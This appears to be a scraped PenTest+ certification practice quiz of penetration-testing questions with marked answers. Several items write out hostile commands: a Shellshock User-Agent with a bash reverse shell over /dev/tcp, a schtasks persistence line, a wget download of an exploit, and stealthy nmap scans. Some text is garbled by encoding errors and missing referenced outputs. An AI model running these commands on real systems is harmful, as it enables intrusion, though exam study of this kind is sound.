Network Security Techniques Quiz

Play an AI-generated podcast conversation about this lesson

A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging. Which of the following techniques would BEST accomplish this goal?

RFID cloning

RFID tagging

Meta tagging

Tag nesting (correct)

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} (correct)

exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}

exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}

exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€ ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

Wireshark (correct)

Nessus

Retina

Shodan (correct)

A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?

nmap -f --badsum 192.168.1.10 Signup and view all the answers

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

Send deauthentication frames to the stations. Signup and view all the answers

SIMULATION - You are a penetration tester running port scans on a server.

INSTRUCTIONS - Part 1: Given the output, construct the command that was used to generate this output from the available options. Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part 1 = nmap 192.168.2.2 -sV -O Part 2 No = nmap 192.168.2.2 -sV -O Part 2 = Weak SMB file permissions Part 1 No = Weak SMB file permissions Signup and view all the answers

Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report?

S/MIME Signup and view all the answers

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?

Stronger algorithmic requirements Signup and view all the answers

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

SQLmap Signup and view all the answers

A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?

nmap -sn 10.12.1.0/24 Signup and view all the answers

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Shodan Signup and view all the answers

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

Whether the cloud service provider allows the penetration tester to test the environment Signup and view all the answers

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

John the Ripper Signup and view all the answers

A penetration tester obtained the following results after scanning a web server using the dirb utility:

Which of the following elements is MOST likely to contain useful information for the penetration tester?

about Signup and view all the answers

A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?

Aircrack-ng Signup and view all the answers

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe Signup and view all the answers

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

Controllers will not validate the origin of commands. Signup and view all the answers

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

Start a packet capture with Wireshark and then run the application. Signup and view all the answers

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

business and network operations may be impacted. Signup and view all the answers

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

Sending many web requests per second to test DDoS protection Signup and view all the answers

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

Buffer overflows Signup and view all the answers

A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

Authority and urgency Signup and view all the answers

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?

Direct object reference Signup and view all the answers

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

After detection of a breach Signup and view all the answers

After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:

Which of the following explains the reason why the command failed?

The tester input the incorrect IP address. Signup and view all the answers

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

Active scanning Signup and view all the answers

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

Dump the user address book on the device. Signup and view all the answers

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

Attestation of findings and delivery of the report Signup and view all the answers

A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

Inform the customer immediately about the backdoor. Signup and view all the answers

Which of the following would a company's hunt team be MOST interested in seeing in a final report?

Attack TTPs Signup and view all the answers

A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?

The inventory of assets and versions Signup and view all the answers

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Metasploit Signup and view all the answers

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

Scapy Signup and view all the answers

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

Stop the assessment and inform the emergency contact. Signup and view all the answers

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

Fraggle Signup and view all the answers

A penetration tester writes the following script:

Which of the following is the tester performing?

Scanning a network for specific open ports Signup and view all the answers

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

OpenVAS Signup and view all the answers

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

nc 127.0.0.1 5555 Signup and view all the answers

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

nmap ג€"T0 192.168.0.1 Signup and view all the answers

A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

Look for open ports. Signup and view all the answers

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?

Remediate the findings. Signup and view all the answers

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

The team discovers another actor on a system on the network. Signup and view all the answers

During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

Rainbow table attack Signup and view all the answers

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

*range(1, 1025) on line 1 populated the portList list in numerical order. Signup and view all the answers

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

chmod u+x script.sh Signup and view all the answers

A penetration tester gains access to a system and establishes persistence. Which of the following actions is the tester MOST likely performing after running the given commands?

Covering tracks by clearing the Bash history Signup and view all the answers

A compliance-based penetration test is primarily concerned with:

determining the efficacy of a specific set of security standards. Signup and view all the answers

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?

Understanding the tactics of a security intrusion can help disrupt them. Signup and view all the answers

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the discovered file with one line of code for remote callback. Signup and view all the answers

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?

Whether sensitive client data is publicly accessible Signup and view all the answers

A penetration tester ran the following command on a staging server: `python -m SimpleHTTPServer 9891`. Which of the following commands could be used to download a file named exploit to a target machine for execution?

wget 10.10.51.50:9891/exploit Signup and view all the answers

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?

chmod 600 /tmp/apache Signup and view all the answers

Which of the following is MOST important to include in the final report of a static application security test that was written for a team of application developers as the intended audience?

Code context for instances of unsafe typecasting operations Signup and view all the answers

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?

SET Signup and view all the answers

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

The existence of default passwords Signup and view all the answers

Which of the following describes the reason why a penetration tester would run the command `sdelete mimikatz.*` on a Windows server that the tester compromised?

To remove tools from the server Signup and view all the answers

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

nmap 192.168.1.1-5 -PS22-25,80 Signup and view all the answers

A penetration tester was brute forcing an internal web server and ran a command that produced output, but when trying to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. What is the MOST likely reason for the lack of output?

This URI returned a server error. Signup and view all the answers

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following MOST likely describes what happened?

The planning process failed to ensure all teams were notified. Signup and view all the answers

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. What is the penetration tester trying to accomplish?

Identify all the vulnerabilities in the environment. Signup and view all the answers

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?

Web archive Signup and view all the answers

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

Run nmap with the --script vulners option set against the target. Signup and view all the answers

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?

A. Run another scanner to compare. B. Perform a manual test on the server. C. Check the results on the scanner. D. Look for the vulnerability online.

Perform a manual test on the server. Signup and view all the answers

A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?

Performing spear phishing against employees by posing as senior management Signup and view all the answers

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack?

WPS Signup and view all the answers

A penetration tester writes a script to achieve certain objectives. Which of the following objectives is the tester attempting to achieve?

Determine active hosts on the network. Signup and view all the answers

A penetration tester ran the following commands on a Windows server. Which of the following should the tester do AFTER delivering the final report?

Remove the tester-created credentials. Signup and view all the answers

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?